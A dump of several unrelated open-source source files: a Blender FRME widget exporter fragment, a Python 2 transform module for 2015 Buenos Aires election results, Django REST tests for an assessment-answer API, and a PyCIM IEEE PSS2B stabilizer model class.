aspect = bpy.context.scene.render.resolution_x / bpy.context.scene.render.resolution_y
if obj.data.type == 'PERSP':
if aspect > 1.0:
fov = math.degrees(math.atan(math.tan(obj.data.angle / 2.0) / aspect)) * 2.0
else:
fov = math.degrees(obj.data.angle)
buffer += struct.pack('>Iffff', 0, fov, aspect, obj.data.clip_start, obj.data.clip_end)
elif obj.data.type == 'ORTHO':
ortho_half = obj.data.ortho_scale / 2.0
buffer += struct.pack('>Iffffff', 1, -ortho_half, ortho_half, ortho_half / aspect,
-ortho_half / aspect, obj.data.clip_start, obj.data.clip_end)
elif obj.retro_widget_type == 'RETRO_MODL':
if len(obj.children) == 0:
raise RuntimeException('Model Widget must have a child model object')
model_obj = obj.children[0]
if model_obj.type != 'MESH':
raise RuntimeException('Model Widget must have a child MESH')
if not model_obj.data.library:
raise RuntimeException('Model Widget must have a linked library MESH')
path = bpy.path.abspath(model_obj.data.library.filepath)
path_hash = path_hasher.hashpath32(path)
buffer += struct.pack('>III', path_hash, 0, obj.retro_model_light_mask)
elif obj.retro_widget_type == 'RETRO_PANE':
buffer += struct.pack('>fffff',
obj.retro_pane_dimensions[0],
obj.retro_pane_dimensions[1],
obj.retro_pane_scale_center[0],
obj.retro_pane_scale_center[1],
obj.retro_pane_scale_center[2])
elif obj.retro_widget_type == 'RETRO_TXPN':
path_hash = path_hasher.hashpath32(obj.retro_textpane_font_path)
buffer += struct.pack('>fffffIbbIIffffffffff',
obj.retro_pane_dimensions[0],
obj.retro_pane_dimensions[1],
obj.retro_pane_scale_center[0],
obj.retro_pane_scale_center[1],
obj.retro_pane_scale_center[2],
path_hash,
obj.retro_textpane_word_wrap,
obj.retro_textpane_horizontal,
hjustifications[obj.retro_textpane_hjustification],
vjustifications[obj.retro_textpane_vjustification],
obj.retro_textpane_fill_color[0],
obj.retro_textpane_fill_color[1],
obj.retro_textpane_fill_color[2],
obj.retro_textpane_fill_color[3],
obj.retro_textpane_outline_color[0],
obj.retro_textpane_outline_color[1],
obj.retro_textpane_outline_color[2],
obj.retro_textpane_outline_color[3],
obj.retro_textpane_block_extent[0],
obj.retro_textpane_block_extent[1])
if version >= 1:
path_hash = path_hasher.hashpath32(obj.retro_textpane_jp_font_path)
buffer += struct.pack('>III',
path_hash,
obj.retro_textpane_jp_font_scale[0],
obj.retro_textpane_jp_font_scale[1])
elif obj.retro_widget_type == 'RETRO_TBGP':
buffer += struct.pack('>HHIHHbbffbfHHHH',
obj.retro_tablegroup_elem_count,
0,
0,
obj.retro_tablegroup_elem_default,
0,
obj.retro_tablegroup_wraparound,
False,
0.0,
0.0,
False,
0.0,
0,
0,
0,
0)
elif obj.retro_widget_type == 'RETRO_GRUP':
buffer += struct.pack('>Hb',
obj.retro_group_default_worker,
False)
elif obj.retro_widget_type == 'RETRO_SLGP':
buffer += struct.pack('>ffff',
obj.retro_slider_min,
obj.retro_slider_max,
obj.retro_slider_default,
obj.retro_slider_increment)
elif obj.retro_widget_type == 'RETRO_ENRG':
path_hash = path_hasher.hashpath32(obj.retro_energybar_texture_path)
buffer += struct.pack('>I', path_hash)
elif obj.retro_widget_type == 'RETRO_METR':
buffer += struct.pack('>bbII',
False,
obj.retro_meter_no_round_up,
obj.retro_meter_max_capacity,
obj.retro_meter_worker_count)
elif obj.retro_widget_type == 'RETRO_LITE':
angle = Quaternion((1.0, 0.0, 0.0), math.radians(-90.0))
type_enum = 0
constant = 1.0
linear = 0.0
quadratic = 0.0
cutoff = 0.0
if obj.data.type == 'POINT':
type_enum = 4
elif obj.data.type == 'SUN':
type_enum = 2
elif obj.data.type == 'SPOT':
type_enum = 0
cutoff = obj.data.spot_size
if obj.data.type == 'POINT' or obj.data.type == 'SPOT':
constant = obj.data.constant_coefficient
linear = obj.data.linear_coefficient
quadratic = obj.data.quadratic_coefficient
buffer += struct.pack('>IffffffI',
type_enum, constant, linear, quadratic,
obj.data.retro_light_angle_constant,
obj.data.retro_light_angle_linear,
obj.data.retro_light_angle_quadratic,
obj.data.retro_light_index)
if obj.data.type == 'SPOT':
buffer += struct.pack('>f', cutoff)
elif obj.retro_widget_type == 'RETRO_IMGP':
if obj.type != 'MESH':
raise RuntimeException('Imagepane Widget must be a MESH')
if len(obj.data.loops) < 4:
raise RuntimeException('Imagepane Widget must be a MESH with 4 verts')
if len(obj.data.uv_layers) < 1:
raise RuntimeException('Imagepane Widget must ba a MESH with a UV layer')
path_hash = 0xffffffff
if len(obj.data.materials):
material = obj.data.materials[0]
if 'Image Texture' in material.node_tree.nodes:
image_node = material.node_tree.nodes['Image Texture']
if image_node.image:
image = image_node.image
path = bpy.path.abspath(image.filepath)
path_hash = path_hasher.hashpath32(path)
buffer += struct.pack('>IIII', path_hash, 0, 0, 4)
for i in range(4):
vi = obj.data.loops[i].vertex_index
co = obj.data.vertices[vi].co
buffer += struct.pack('>fff', co[0], co[1], co[2])
buffer += struct.pack('>I', 4)
for i in range(4):
co = obj.data.uv_layers[0].data[i].uv
buffer += struct.pack('>ff', co[0], co[1])
if obj.retro_widget_is_worker:
buffer += struct.pack('>bH', True, obj.retro_widget_worker_id)
else:
buffer += struct.pack('>b', False)
angMtx = angle.to_matrix() @ obj.matrix_local.to_3x3()
buffer += struct.pack('>fffffffffffffffIH',
obj.matrix_local[0][3],
obj.matrix_local[1][3],
obj.matrix_local[2][3],
angMtx[0][0], angMtx[0][1], angMtx[0][2],
angMtx[1][0], angMtx[1][1], angMtx[1][2],
angMtx[2][0], angMtx[2][1], angMtx[2][2],
0.0, 0.0, 0.0, 0, 0)
ch_list = []
for ch in obj.children:
ch_list.append((ch.pass_index, ch.name))
for s_pair in sorted(ch_list):
ch = bpy.data.objects[s_pair[1]]
if ch.retro_widget_type != 'RETRO_NONE':
recursive_cook(buffer, ch, version, path_hasher, obj.name)
def cook(writepipebuf, version, path_hasher):
global hjustifications, vjustifications, model_draw_flags_e
hjustifications = dict((i[0], i[3]) for i in bpy.types.Object.retro_textpane_hjustification[1]['items'])
vjustifications = dict((i[0], i[3]) for i in bpy.types.Object.retro_textpane_vjustification[1]['items'])
model_draw_flags_e = dict((i[0], i[3]) for i in bpy.types.Object.retro_widget_model_draw_flags[1]['items'])
buffer = bytearray()
buffer += struct.pack('>IIII', 0, 0, 0, 0)
widget_count = 0
for obj in bpy.data.objects:
if obj.retro_widget_type != 'RETRO_NONE':
widget_count += 1
buffer += struct.pack('>I', widget_count)
for obj in bpy.data.objects:
if obj.retro_widget_type != 'RETRO_NONE' and not obj.parent:
recursive_cook(buffer, obj, version, path_hasher, 'kGSYS_DummyWidgetID')
return buffer
# Registration
def register():
frame_widget_types = [
('RETRO_NONE', 'Not a Widget', '', 0),
('RETRO_BWIG', 'Base Widget', '', 1),
('RETRO_CAMR', 'Camera', '', 2),
('RETRO_ENRG', 'Energy Bar', '', 3),
('RETRO_GRUP', 'Group', '', 4),
('RETRO_HWIG', 'Head Widget', '', 5),
('RETRO_IMGP', 'Image Pane', '', 6),
('RETRO_LITE', 'Light', '', 7),
('RETRO_MODL', 'Model', '', 8),
('RETRO_METR', 'Meter', '', 9),
('RETRO_PANE', 'Pane', '', 10),
('RETRO_SLGP', 'Slider Group', '', 11),
('RETRO_TBGP', 'Table Group', '', 12),
('RETRO_TXPN', 'Text Pane', '', 13)]
bpy.types.Object.retro_widget_type = bpy.props.EnumProperty(items=frame_widget_types, name='Retro: FRME Widget Type', default='RETRO_NONE')
model_draw_flags = [
('RETRO_SHADELESS', 'Shadeless', '', 0),
('RETRO_OPAQUE', 'Opaque', '', 1),
('RETRO_ALPHA', 'Alpha', '', 2),
('RETRO_ADDITIVE', 'Additive', '', 3),
('RETRO_ALPHA_ADDITIVE_OVERDRAW', 'Alpha Additive Overdraw', '', 4)]
bpy.types.Object.retro_widget_parent = bpy.props.StringProperty(name='Retro: FRME Widget Parent', description='Refers to internal frame widgets')
bpy.types.Object.retro_widget_use_anim_controller = bpy.props.BoolProperty(name='Retro: Use Animiation Conroller')
bpy.types.Object.retro_widget_default_visible = bpy.props.BoolProperty(name='Retro: Default Visible', description='Sets widget is visible by default')
bpy.types.Object.retro_widget_default_active = bpy.props.BoolProperty(name='Retro: Default Active', description='Sets widget is cases by default')
bpy.types.Object.retro_widget_cull_faces = bpy.props.BoolProperty(name='Retro: Cull Faces', description='Enables face culling')
bpy.types.Object.retro_widget_color = bpy.props.FloatVectorProperty(name='Retro: Color', description='Sets widget color', subtype='COLOR', size=4, min=0.0, max=1.0)
bpy.types.Object.retro_widget_model_draw_flags = bpy.props.EnumProperty(items=model_draw_flags, name='Retro: Model Draw Flags', default='RETRO_ALPHA')
bpy.types.Object.retro_widget_is_worker = bpy.props.BoolProperty(name='Retro: Is Worker Widget', default=False)
bpy.types.Object.retro_widget_worker_id = bpy.props.IntProperty(name='Retro: Worker Widget ID', min=0, default=0)
bpy.types.Object.retro_model_light_mask = bpy.props.IntProperty(name='Retro: Model Light Mask', min=0, default=0)
bpy.types.Object.retro_pane_dimensions = bpy.props.FloatVectorProperty(name='Retro: Pane Dimensions', min=0.0, size=2)
bpy.types.Object.retro_pane_scale_center = bpy.props.FloatVectorProperty(name='Retro: Scale Center', size=3)
bpy.types.Object.retro_textpane_font_path = bpy.props.StringProperty(name='Retro: Font Path')
bpy.types.Object.retro_textpane_word_wrap = bpy.props.BoolProperty(name='Retro: Word Wrap')
bpy.types.Object.retro_textpane_horizontal = bpy.props.BoolProperty(name='Retro: Horizontal', default=True)
bpy.types.Object.retro_textpane_fill_color = bpy.props.FloatVectorProperty(name='Retro: Fill Color', min=0.0, max=1.0, size=4, subtype='COLOR')
bpy.types.Object.retro_textpane_outline_color = bpy.props.FloatVectorProperty(name='Retro: Outline Color', min=0.0, max=1.0, size=4, subtype='COLOR')
bpy.types.Object.retro_textpane_block_extent = bpy.props.FloatVectorProperty(name='Retro: Block Extent', min=0.0, size=2)
bpy.types.Object.retro_textpane_jp_font_path = bpy.props.StringProperty(name='Retro: Japanese Font Path')
bpy.types.Object.retro_textpane_jp_font_scale = bpy.props.IntVectorProperty(name='Retro: Japanese Font Scale', min=0, size=2)
frame_textpane_hjustifications = [
('LEFT', 'Left', '', 0),
('CENTER', 'Center', '', 1),
('RIGHT', 'Right', '', 2),
('FULL', 'Full', '', 3),
('NLEFT', 'Left Normalized', '', 4),
('NCENTER', 'Center Normalized', '', 5),
('NRIGHT', 'Right Normalized', '', 6),
('LEFTMONO', 'Left Monospaced', '', 7),
('CENTERMONO', 'Center Monospaced', '', 8),
('RIGHTMONO', 'Right Monospaced', '', 9)]
bpy.types.Object.retro_textpane_hjustification = bpy.props.EnumProperty(items=frame_textpane_hjustifications, name='Retro: Horizontal Justification', default='LEFT')
frame_textpane_vjustifications = [
('TOP', 'Top', '', 0),
('CENTER', 'Center', '', 1),
('BOTTOM', 'Bottom', '', 2),
('FULL', 'Full', '', 3),
('NTOP', 'Top Normalized', '', 4),
('NCENTER', 'Center Normalized', '', 5),
('NBOTTOM', 'Bottom Normalized', '', 6),
('TOPMONO', 'Top Monospaced', '', 7),
('CENTERMONO', 'Center Monospaced', '', 8),
('BOTTOMMONO', 'Bottom Monospaced', '', 9)]
bpy.types.Object.retro_textpane_vjustification = bpy.props.EnumProperty(items=frame_textpane_vjustifications, name='Retro: Vertical Justification', default='TOP')
bpy.types.Object.retro_tablegroup_elem_count = bpy.props.IntProperty(name='Retro: Table Group Element Count', min=0, default=0)
bpy.types.Object.retro_tablegroup_elem_default = bpy.props.IntProperty(name='Retro: Table Group Default Element', min=0, default=0)
bpy.types.Object.retro_tablegroup_wraparound = bpy.props.BoolProperty(name='Retro: Table Group Wraparound', default=False)
bpy.types.Object.retro_group_default_worker = bpy.props.IntProperty(name='Retro: Group Default Worker', min=0, default=0)
bpy.types.Object.retro_slider_min = bpy.props.FloatProperty(name='Retro: Slider Min', default=0.0)
bpy.types.Object.retro_slider_max = bpy.props.FloatProperty(name='Retro: Slider Max', default=1.0)
bpy.types.Object.retro_slider_default = bpy.props.FloatProperty(name='Retro: Slider Default', default=0.0)
bpy.types.Object.retro_slider_increment = bpy.props.FloatProperty(name='Retro: Slider Increment', min=0.0, default=1.0)
bpy.types.Object.retro_energybar_texture_path = bpy.props.StringProperty(name='Retro: Energy Bar Texture Path')
bpy.types.Object.retro_meter_no_round_up = bpy.props.BoolProperty(name='Retro: No Round Up', default=True)
bpy.types.Object.retro_meter_max_capacity = bpy.props.IntProperty(name='Retro: Max Capacity', min=0, default=100)
bpy.types.Object.retro_meter_worker_count = bpy.props.IntProperty(name='Retro: Worker Count', min=0, default=1)
bpy.types.Light.retro_light_index = bpy.props.IntProperty(name='Retro: Light Index', min=0, default=0)
bpy.types.Light.retro_light_angle_constant = bpy.props.FloatProperty(name='Retro: Light Angle Constant', min=0.0, default=0.0)
bpy.types.Light.retro_light_angle_linear = bpy.props.FloatProperty(name='Retro: Light Angle Linear', min=0.0, default=0.0)
bpy.types.Light.retro_light_angle_quadratic = bpy.props.FloatProperty(name='Retro: Light Angle Quadratic', min=0.0, default=0.0)
| mit | -7,502,796,951,139,289,000 | 53.212276 | 169 | 0.586168 | false |
lanacioncom/elecciones_2015_caba | backend/scripts/apitransforms.py | 1 | 8671 | # coding: utf-8
import logging
# TODO Remove only for testing
import json
import io
from utils import get_percentage, format_percentage, sort_results_by_percentage
from config import JSON_EXAMPLE_PATH, SPECIAL_PARTIES, PASS_THRESHOLD
from config import Paso2015
log = logging.getLogger('paso.%s' % (__name__))
PERC_KEYS = ["pct", "pct_total"]
RESUMEN_RENAME = {
'Electores': 'e',
'VotantesJef': 'v',
'Mesas': 'mt',
'MesasInformadas': 'mi',
'UltimaActualizacion': 'ut'
}
RESULTS_CAND_RENAME = {
"id_candidato": "id",
"votos": "v",
"pct": "p",
"pct_total": "pt"
}
RESULTS_PARTY_RENAME = {
"votos": "v",
"pct": "p",
"id_partido": "id",
}
RESULTS_PARTY_SUMM_RENAME = {
"votos": "v",
"pct": "p",
}
def to_json(fname=None, d=None):
'''For testing purposes'''
with io.open('%s/%s.json'
% (JSON_EXAMPLE_PATH, fname),
'w', encoding='utf8') as f:
log.debug("writing output JSON: %s.json" % (fname))
f.write(json.dumps(d, ensure_ascii=False))
def t_rename_data(d=None, translation=None, p_keys=None):
'''translate desired data'''
target_dict = {}
try:
for k, v in translation.iteritems():
if (k in p_keys):
d[k] = format_percentage(d[k])
target_dict[v] = d[k]
except KeyError, e:
log.error("Could not find required key %s in %s" % (k, d))
raise Paso2015(__name__)
return target_dict
def t_resumen_API(origin_dict=None):
'''get the desired data'''
target_dict = {}
try:
for k, v in RESUMEN_RENAME.iteritems():
target_dict[v] = origin_dict['resumen'][k]
except KeyError:
log.error("Could not find required key %s in %s" % (k, origin_dict))
raise Paso2015(__name__)
# Calculate table percentage
mp = get_percentage(target_dict, 'mi', 'mt')
target_dict["mp"] = mp
# Calculate voting percentage
vp = get_percentage(target_dict, 'v', 'e')
target_dict["vp"] = vp
return target_dict
def t_results_section_API(d=None, comuna=None, dest_dict=None):
'''Transform the received data
to the desired format'''
a99 = []
a00 = []
try:
if not comuna:
# 0 stores the global results for the election
data = d["general"][0]["partidos"]
else:
data = d["general"][0]["comunas"]["partidos"]
except (KeyError, IndexError), e:
log.error("Did not find data in memory. Reason" % (str(e)))
raise Paso2015(__name__)
try:
for idx, row in enumerate(data):
a00.append(t_rename_data(row, RESULTS_PARTY_RENAME, PERC_KEYS))
if len(row["listas"]) == 1:
# Do not include special parties inside "Listas únicas"
if row["id_partido"] not in SPECIAL_PARTIES:
a99.append(t_rename_data(row,
RESULTS_PARTY_RENAME,
PERC_KEYS))
else:
# Create transformed array for parties with many candidates
t_a = [t_rename_data(l, RESULTS_CAND_RENAME, PERC_KEYS)
for l in row["listas"]]
if not comuna:
# First time we see the party create a dictionary for it
# and append results
t_d = {"r": t_rename_data(row,
RESULTS_PARTY_SUMM_RENAME,
PERC_KEYS),
"c_%02d" % (comuna): t_a}
# Create the key for the policitical party
# inside the target dict
dest_dict["partido_%s"
% (row["id_partido"])] = t_d
else:
# For every other section
# We only need to create a section key
# with the candidates array
dest_dict["partido_%s"
% (row["id_partido"])]["c_%02d" % (comuna)] = t_a
except KeyError, e:
log.error("Error processing key. Reason %s" % (str(e)))
raise Paso2015(__name__)
except IndexError, e:
log.error("Error processing index. Reason %s" % (str(e)))
raise Paso2015(__name__)
dest_dict["partido_99"]["c_%02d" % (comuna)] = a99
dest_dict["partido_00"]["c_%02d" % (comuna)] = a00
def t_sort_results_API(d_d=None):
''' sort the results by descending percentage
taking into account special parties at the bottom'''
for k, v in d_d.iteritems():
if k == "resumen":
continue
if k == "partido_00":
sort_results_by_percentage(v, special=True)
else:
sort_results_by_percentage(v, special=False)
def t_results_API(origin_list=None, dest_dict=None):
'''main transformation
we need to switch from section based driven data
to political party driven data'''
for i, v in enumerate(origin_list):
log.debug("transform results for section %s" % (i))
t_results_section_API(v, i, dest_dict)
# Sort special party results
t_sort_results_API(dest_dict)
# Write to file to preview intermediate result
# to_json("datos_completos",dest_dict)
# QeQ candidates transformations
def t_candidates_percentage(d=None):
'''Transform candidates percentage for piece automation'''
try:
data = d[0]["general"][0]["partidos"]
except (KeyError, IndexError), e:
log.error("Error getting data from memory. Reason %s"
% (str(e)))
raise Paso2015(__name__)
result = {}
cand_list = []
for row in data:
# Skip special political parties
try:
if row["id_partido"] in SPECIAL_PARTIES:
continue
if (float(row["pct"]) >= PASS_THRESHOLD):
party_passed = True
else:
party_passed = False
# Get maximum number of votes for a party primary
max_v = int(max(row["listas"],
key=lambda x: int(x["votos"]))["votos"])
for c_d in row["listas"]:
tmp_cand = {"id": c_d["id_candidato"],
"p": format_percentage(c_d["pct_total"]),
"g": "1" if (int(c_d["votos"]) == max_v) else "0",
"pp": "1" if party_passed else "0"}
cand_list.append(tmp_cand)
except (KeyError, ValueError, IndexError), e:
log.error("Failed to get the candidate percentage. Reason: %s"
% (str(e)))
raise Paso2015(__name__)
# Order candidate list by descending percentage
cand_list.sort(key=lambda x: float(x['p']), reverse=True)
result["candidatos"] = cand_list
return result
# Front page ranking transformations
def t_ranking(d_d=None):
'''Transformation to obtain the ranking data for
the front page'''
try:
data_parties = d_d["partido_00"]["c_00"]
data_summary = d_d["resumen"]
except KeyError, e:
log.error("Error getting data from memory. Reason %s"
% (str(e)))
raise Paso2015(__name__)
result = {}
# Get the summary of avaible voting tables
result["mp"] = data_summary["mp"]
# Get the top three parties
parties_list = []
try:
for row in data_parties[0:3]:
party = {"id": row["id"], "p": row["p"]}
candidates_list = []
try:
data_primary = d_d["partido_%s" % (row["id"])]["c_00"]
for c in data_primary[0:2]:
candidates_list.append({"id": c["id"], "pt": c["pt"]})
except KeyError:
# Did not find party try over the rest of "listas únicas"
try:
data_primary = d_d["partido_99"]["c_00"]
# Inside "Listas únicas there is only one percentage"
candidates_list.append({"id": c["id"], "pt": c["p"]})
except (KeyError, ValueError, IndexError), e:
log.error("Did not find the party. Reason %s"
% (str(e)))
raise Paso2015(__name__)
party["candidatos"] = candidates_list
parties_list.append(party)
except IndexError, e:
log.error("Did not find at least 3 parties. Reason %s"
% (str(e)))
raise Paso2015(__name__)
result["partidos"] = parties_list
return result
| mit | 3,808,144,704,324,429,300 | 34.235772 | 79 | 0.524919 | false |
eaudeweb/lcc-toolkit | lcc/tests/answer.py | 1 | 6176 | import json
from django.contrib.auth.models import User
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from lcc.models import (
Answer, Assessment, Country, Question
)
from lcc.serializers import AnswerSerializer
from lcc.tests.taxonomy import create_taxonomy_classication
class GetAnswersTest(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', '[email protected]', 'test1234')
self.client.login(username='testuser', password='test1234')
self.country = Country.objects.create(iso='ROU', name='Romania')
self.assessment = Assessment.objects.create(
user=self.user, country=self.country)
self.classification = create_taxonomy_classication()
self.question_1 = Question.objects.create(
text="Question 1 text", parent=None,
order=1, classification=self.classification)
self.question_2 = Question.objects.create(
text="Question 2 text", parent=None,
order=2, classification=self.classification)
self.question_3 = Question.objects.create(
text="Question 3 text", parent=self.question_1,
order=1, classification=self.classification)
self.question_4 = Question.objects.create(
text="Question 4 text", parent=self.question_2,
order=1, classification=self.classification)
self.answer_1 = Answer.objects.create(
assessment=self.assessment, question=self.question_1, value=True)
self.answer_2 = Answer.objects.create(
assessment=self.assessment, question=self.question_2, value=True)
self.answer_3 = Answer.objects.create(
assessment=self.assessment, question=self.question_3, value=False)
def test_get_all_answers(self):
response = self.client.get(reverse('lcc:api:answers_list_create'))
answers = Answer.objects.all()
serializer = AnswerSerializer(answers, many=True)
json_res = json.loads(response.content.decode())
json_ser = json.loads(json.dumps(serializer.data))
self.assertEqual(json_res, json_ser)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_single_answer(self):
response = self.client.get(
reverse('lcc:api:answers_get_update', args=[self.answer_1.pk]))
serializer = AnswerSerializer(self.answer_1)
json_res = json.loads(response.content.decode())
json_ser = json.loads(json.dumps(serializer.data))
self.assertEqual(json_res, json_ser)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_invalid_single_answer(self):
response = self.client.get(
reverse('lcc:api:answers_get_update', args=[100]),
expect_errors=True
)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class CreateAnswersTest(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', '[email protected]', 'test1234')
self.client.login(username='testuser', password='test1234')
self.country = Country.objects.create(iso='ro', name='Romania')
self.assessment = Assessment.objects.create(
user=self.user, country=self.country)
self.classification = create_taxonomy_classication()
self.question_1 = Question.objects.create(
text="Question 1 text", parent=None,
order=1, classification=self.classification)
self.answer_valid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": True
}
self.answer_invalid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": None
}
def test_create_valid_answer(self):
response = self.client.post(
reverse('lcc:api:answers_list_create'),
json.dumps(self.answer_valid_payload),
data_type='json',
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_invalid_answer(self):
response = self.client.post(
reverse('lcc:api:answers_list_create'),
json.dumps(self.answer_invalid_payload),
data_type='json',
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
class UpdateSingleAnswer(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', '[email protected]', 'test1234')
self.client.login(username='testuser', password='test1234')
self.country = Country.objects.create(iso='ROU', name='Romania')
self.assessment = Assessment.objects.create(
user=self.user, country=self.country)
self.classification = create_taxonomy_classication()
self.question_1 = Question.objects.create(
text="Question 1 text", parent=None,
order=1, classification=self.classification)
self.answer_1 = Answer.objects.create(
assessment=self.assessment, question=self.question_1, value=True)
self.answer_valid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": not self.answer_1.value
}
self.answer_invalid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": None
}
def test_valid_update_answer(self):
response = self.client.put(
reverse('lcc:api:answers_get_update', args=[self.answer_1.pk]),
json.dumps({
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": False
}),
data_type='json',
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
| gpl-3.0 | 359,729,923,295,122,600 | 37.842767 | 78 | 0.628886 | false |
rwl/PyCIM | CIM14/IEC61970/Dynamics/PowerSystemStabilizers/PssIEEE2B.py | 1 | 7134 | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.IEC61970.Dynamics.PowerSystemStabilizers.PowerSystemStabilizer import PowerSystemStabilizer
class PssIEEE2B(PowerSystemStabilizer):
"""IEEE (2005) PSS2B Model This stabilizer model is designed to represent a variety of dual-input stabilizers, which normally use combinations of power and speed or frequency to derive the stabilizing signal.
"""
def __init__(self, t11=0.0, vsi1max=0.0, t3=0.0, tw3=0.0, vstmax=0.0, t2=0.0, n=0, vsi1min=0.0, t9=0.0, ks2=0.0, vstmin=0.0, j1=0, tw1=0.0, tb=0.0, t7=0.0, vsi2max=0.0, t6=0.0, t1=0.0, m=0, vsi2min=0.0, a=0.0, t4=0.0, tw4=0.0, ks4=0.0, ta=0.0, ks3=0.0, t10=0.0, tw2=0.0, j2=0, ks1=0.0, t8=0.0, *args, **kw_args):
"""Initialises a new 'PssIEEE2B' instance.
@param t11: Lead/lag time constant
@param vsi1max: Input signal #1 max limit
@param t3: Lead/lag time constant
@param tw3: First washout on signal #2
@param vstmax: Stabilizer output max limit
@param t2: Lead/lag time constant
@param n: Order of ramp tracking filter
@param vsi1min: Input signal #1 min limit
@param t9: Lag of ramp tracking filter
@param ks2: Gain on signal #2
@param vstmin: Stabilizer output min limit
@param j1: Input signal #1 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
@param tw1: First washout on signal #1
@param tb: Lag time constant
@param t7: Time constant on signal #2
@param vsi2max: Input signal #2 max limit
@param t6: Time constant on signal #1
@param t1: Lead/lag time constant
@param m: Denominator order of ramp tracking filter
@param vsi2min: Input signal #2 min limit
@param a: Numerator constant
@param t4: Lead/lag time constant
@param tw4: Second washout on signal #2
@param ks4: Gain on signal #2 input after ramp-tracking filter
@param ta: Lead constant
@param ks3: Gain on signal #2 input before ramp-tracking filter
@param t10: Lead/lag time constant
@param tw2: Second washout on signal #1
@param j2: Input signal #2 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
@param ks1: Stabilizer gain
@param t8: Lead of ramp tracking filter
"""
#: Lead/lag time constant
self.t11 = t11
#: Input signal #1 max limit
self.vsi1max = vsi1max
#: Lead/lag time constant
self.t3 = t3
#: First washout on signal #2
self.tw3 = tw3
#: Stabilizer output max limit
self.vstmax = vstmax
#: Lead/lag time constant
self.t2 = t2
#: Order of ramp tracking filter
self.n = n
#: Input signal #1 min limit
self.vsi1min = vsi1min
#: Lag of ramp tracking filter
self.t9 = t9
#: Gain on signal #2
self.ks2 = ks2
#: Stabilizer output min limit
self.vstmin = vstmin
#: Input signal #1 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
self.j1 = j1
#: First washout on signal #1
self.tw1 = tw1
#: Lag time constant
self.tb = tb
#: Time constant on signal #2
self.t7 = t7
#: Input signal #2 max limit
self.vsi2max = vsi2max
#: Time constant on signal #1
self.t6 = t6
#: Lead/lag time constant
self.t1 = t1
#: Denominator order of ramp tracking filter
self.m = m
#: Input signal #2 min limit
self.vsi2min = vsi2min
#: Numerator constant
self.a = a
#: Lead/lag time constant
self.t4 = t4
#: Second washout on signal #2
self.tw4 = tw4
#: Gain on signal #2 input after ramp-tracking filter
self.ks4 = ks4
#: Lead constant
self.ta = ta
#: Gain on signal #2 input before ramp-tracking filter
self.ks3 = ks3
#: Lead/lag time constant
self.t10 = t10
#: Second washout on signal #1
self.tw2 = tw2
#: Input signal #2 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
self.j2 = j2
#: Stabilizer gain
self.ks1 = ks1
#: Lead of ramp tracking filter
self.t8 = t8
super(PssIEEE2B, self).__init__(*args, **kw_args)
_attrs = ["t11", "vsi1max", "t3", "tw3", "vstmax", "t2", "n", "vsi1min", "t9", "ks2", "vstmin", "j1", "tw1", "tb", "t7", "vsi2max", "t6", "t1", "m", "vsi2min", "a", "t4", "tw4", "ks4", "ta", "ks3", "t10", "tw2", "j2", "ks1", "t8"]
_attr_types = {"t11": float, "vsi1max": float, "t3": float, "tw3": float, "vstmax": float, "t2": float, "n": int, "vsi1min": float, "t9": float, "ks2": float, "vstmin": float, "j1": int, "tw1": float, "tb": float, "t7": float, "vsi2max": float, "t6": float, "t1": float, "m": int, "vsi2min": float, "a": float, "t4": float, "tw4": float, "ks4": float, "ta": float, "ks3": float, "t10": float, "tw2": float, "j2": int, "ks1": float, "t8": float}
_defaults = {"t11": 0.0, "vsi1max": 0.0, "t3": 0.0, "tw3": 0.0, "vstmax": 0.0, "t2": 0.0, "n": 0, "vsi1min": 0.0, "t9": 0.0, "ks2": 0.0, "vstmin": 0.0, "j1": 0, "tw1": 0.0, "tb": 0.0, "t7": 0.0, "vsi2max": 0.0, "t6": 0.0, "t1": 0.0, "m": 0, "vsi2min": 0.0, "a": 0.0, "t4": 0.0, "tw4": 0.0, "ks4": 0.0, "ta": 0.0, "ks3": 0.0, "t10": 0.0, "tw2": 0.0, "j2": 0, "ks1": 0.0, "t8": 0.0}
_enums = {}
_refs = []
